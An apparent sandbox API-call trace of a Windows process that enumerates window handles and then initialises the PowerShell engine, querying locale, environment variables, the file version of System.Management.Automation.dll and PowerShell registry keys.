	[0571.949] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x197c
	[0571.949] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1978
	[0571.949] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1824
	[0571.949] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1088
	[0571.950] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1908
	[0571.950] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x18cc
	[0571.950] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x18d0
	[0571.950] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1840
	[0571.950] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x10c4
	[0571.950] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x128c
	[0571.950] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x16e8
	[0571.950] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x16cc
	[0571.950] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x274
	[0571.951] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x10e0
	[0571.951] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x10cc
	[0571.951] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x10c0
	[0571.951] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x10d0
	[0571.951] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1198
	[0571.951] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1080
	[0571.951] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1074
	[0571.951] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x106c
	[0571.952] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1474
	[0571.952] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1414
	[0571.952] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xbd0
	[0571.952] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x550
	[0571.952] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xa38
	[0571.952] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x16d0
	[0571.952] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x16d4
	[0571.952] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x15bc
	[0571.953] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x15a0
	[0571.953] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x159c
	[0571.953] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1598
	[0571.953] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1594
	[0571.953] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1590
	[0571.953] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x158c
	[0571.953] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1588
	[0571.953] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1584
	[0571.954] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1580
	[0571.954] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x157c
	[0571.954] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1488
	[0571.954] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1404
	[0571.954] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x11b8
	[0571.954] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xbd4
	[0571.954] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe0c
	[0571.954] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xd30
	[0571.954] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe70
	[0571.955] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x13b8
	[0571.955] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe20
	[0571.955] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe2c
	[0571.955] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe00
	[0571.955] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe04
	[0571.955] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc94
	[0571.955] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x13b0
	[0571.955] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x13ac
	[0571.956] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x13a8
	[0571.956] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1374
	[0571.956] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x132c
	[0571.956] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1328
	[0571.956] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x12d0
	[0571.956] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x12cc
	[0571.956] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x12c8
	[0571.956] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1290
	[0571.957] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1218
	[0571.957] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1214
	[0571.957] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x11ec
	[0571.957] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x11e8
	[0571.957] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x11cc
	[0571.957] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1140
	[0571.957] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe6c
	[0571.957] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x6e8
	[0571.958] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc6c
	[0571.958] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf94
	[0571.958] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xffc
	[0571.958] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf74
	[0571.958] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf08
	[0571.958] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf0c
	[0571.958] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xed8
	[0571.958] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe90
	[0571.959] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xea8
	[0571.959] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xfa8
	[0571.959] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xfbc
	[0571.959] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xfb8
	[0571.959] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xfb4
	[0571.959] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xfb0
	[0571.959] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xfac
	[0571.959] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xfc0
	[0571.960] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xfd0
	[0571.960] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf88
	[0571.960] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf84
	[0571.960] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf80
	[0571.960] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xde0
	[0571.960] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xddc
	[0571.960] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xdd8
	[0571.960] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xd34
	[0571.961] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xd10
	[0571.961] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xd0c
	[0571.961] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc9c
	[0571.961] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc74
	[0571.961] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc1c
	[0571.961] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc08
	[0573.572] WerSetFlags () returned 0x0
	[0573.580] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0573.580] CoTaskMemFree (pv=0x0) 
	[0573.581] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e028, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e020 | out: pulNumLanguages=0x16e028, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e020) returned 1
	[0573.581] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e028, pwszLanguagesBuffer=0x2d21730, pcchLanguagesBuffer=0x16e020 | out: pulNumLanguages=0x16e028, pwszLanguagesBuffer=0x2d21730, pcchLanguagesBuffer=0x16e020) returned 1
	[0573.588] CoTaskMemAlloc (cb=0x24) returned 0x2e7410
	[0573.588] GetUserDefaultLocaleName (in: lpLocaleName=0x2e7410, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0573.588] CoTaskMemFree (pv=0x2e7410) 
	[0573.612] CoTaskMemAlloc (cb=0x104) returned 0x23bed0
	[0573.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0573.613] CoTaskMemFree (pv=0x23bed0) 
	[0575.129] CoTaskMemAlloc (cb=0x104) returned 0x23bed0
	[0575.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.129] CoTaskMemFree (pv=0x23bed0) 
	[0575.131] CoTaskMemAlloc (cb=0x104) returned 0x23bed0
	[0575.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.131] CoTaskMemFree (pv=0x23bed0) 
	[0575.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0575.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0575.140] SetErrorMode (uMode=0x1) returned 0x1
	[0575.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16dca0 | out: lpFileInformation=0x16dca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0575.140] SetErrorMode (uMode=0x1) returned 0x1
	[0575.140] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16df10 | out: lpdwHandle=0x16df10) returned 0x94c
	[0575.141] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d24fc0 | out: lpData=0x2d24fc0) returned 1
	[0575.142] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16de88, puLen=0x16de80 | out: lplpBuffer=0x16de88*=0x2d2505c, puLen=0x16de80) returned 1
	[0575.142] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x2d25138, puLen=0x16ddf0) returned 1
	[0575.142] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0575.142] CoTaskMemAlloc (cb=0x2e) returned 0x2e9910
	[0575.142] lstrcpyW (in: lpString1=0x2e9910, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0575.142] CoTaskMemFree (pv=0x2e9910) 
	[0575.142] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x2d2518c, puLen=0x16ddf0) returned 1
	[0575.142] lstrlenW (lpString="System.Management.Automation") returned 28
	[0575.142] CoTaskMemAlloc (cb=0x3c) returned 0x2f21b0
	[0575.142] lstrcpyW (in: lpString1=0x2f21b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0575.142] CoTaskMemFree (pv=0x2f21b0) 
	[0575.142] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x2d251e8, puLen=0x16ddf0) returned 1
	[0575.142] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0575.142] CoTaskMemAlloc (cb=0x20) returned 0x2ee530
	[0575.142] lstrcpyW (in: lpString1=0x2ee530, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0575.142] CoTaskMemFree (pv=0x2ee530) 
	[0575.143] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x2d25228, puLen=0x16ddf0) returned 1
	[0575.143] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0575.143] CoTaskMemAlloc (cb=0x44) returned 0x2f21b0
	[0575.143] lstrcpyW (in: lpString1=0x2f21b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0575.143] CoTaskMemFree (pv=0x2f21b0) 
	[0575.143] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x2d25290, puLen=0x16ddf0) returned 1
	[0575.143] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0575.143] CoTaskMemAlloc (cb=0x76) returned 0x291170
	[0575.143] lstrcpyW (in: lpString1=0x291170, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0575.143] CoTaskMemFree (pv=0x291170) 
	[0575.143] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x2d2532c, puLen=0x16ddf0) returned 1
	[0575.143] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0575.143] CoTaskMemAlloc (cb=0x44) returned 0x2f21b0
	[0575.143] lstrcpyW (in: lpString1=0x2f21b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0575.143] CoTaskMemFree (pv=0x2f21b0) 
	[0575.143] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x2d25390, puLen=0x16ddf0) returned 1
	[0575.143] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0575.143] CoTaskMemAlloc (cb=0x58) returned 0x276b00
	[0575.143] lstrcpyW (in: lpString1=0x276b00, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0575.143] CoTaskMemFree (pv=0x276b00) 
	[0575.143] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x2d2540c, puLen=0x16ddf0) returned 1
	[0575.143] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0575.143] CoTaskMemAlloc (cb=0x20) returned 0x2ee530
	[0575.143] lstrcpyW (in: lpString1=0x2ee530, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0575.143] CoTaskMemFree (pv=0x2ee530) 
	[0575.143] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x2d250b4, puLen=0x16ddf0) returned 1
	[0575.143] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0575.143] CoTaskMemAlloc (cb=0x66) returned 0x2ed760
	[0575.143] lstrcpyW (in: lpString1=0x2ed760, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0575.143] CoTaskMemFree (pv=0x2ed760) 
	[0575.143] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x0, puLen=0x16ddf0) returned 0
	[0575.144] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x0, puLen=0x16ddf0) returned 0
	[0575.144] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x0, puLen=0x16ddf0) returned 0
	[0575.144] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16ddc8, puLen=0x16ddc0 | out: lplpBuffer=0x16ddc8*=0x2d2505c, puLen=0x16ddc0) returned 1
	[0575.144] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0575.144] VerLanguageNameW (in: wLang=0x0, szLang=0x293a20, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0575.144] CoTaskMemFree (pv=0x293a20) 
	[0575.144] VerQueryValueW (in: pBlock=0x2d24fc0, lpSubBlock="\\", lplpBuffer=0x16de18, puLen=0x16de10 | out: lplpBuffer=0x16de18*=0x2d24fe8, puLen=0x16de10) returned 1
	[0575.153] CoTaskMemAlloc (cb=0x104) returned 0x23bed0
	[0575.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.153] CoTaskMemFree (pv=0x23bed0) 
	[0575.158] CoTaskMemAlloc (cb=0x104) returned 0x23bed0
	[0575.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.158] CoTaskMemFree (pv=0x23bed0) 
	[0575.162] lstrlenW (lpString="䅁") returned 1
	[0575.171] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dce8 | out: phkResult=0x16dce8*=0x2f4) returned 0x0
	[0575.173] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dcd8 | out: phkResult=0x16dcd8*=0x2f8) returned 0x0
	[0575.173] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dd68 | out: phkResult=0x16dd68*=0x2fc) returned 0x0
	[0576.551] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dcac, lpData=0x0, lpcbData=0x16dca8*=0x0 | out: lpType=0x16dcac*=0x1, lpData=0x0, lpcbData=0x16dca8*=0x56) returned 0x0
	[0576.552] CoTaskMemAlloc (cb=0x5a) returned 0x2ed6f0
	[0576.552] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc7c, lpData=0x2ed6f0, lpcbData=0x16dc78*=0x56 | out: lpType=0x16dc7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dc78*=0x56) returned 0x0
	[0576.552] CoTaskMemFree (pv=0x2ed6f0) 
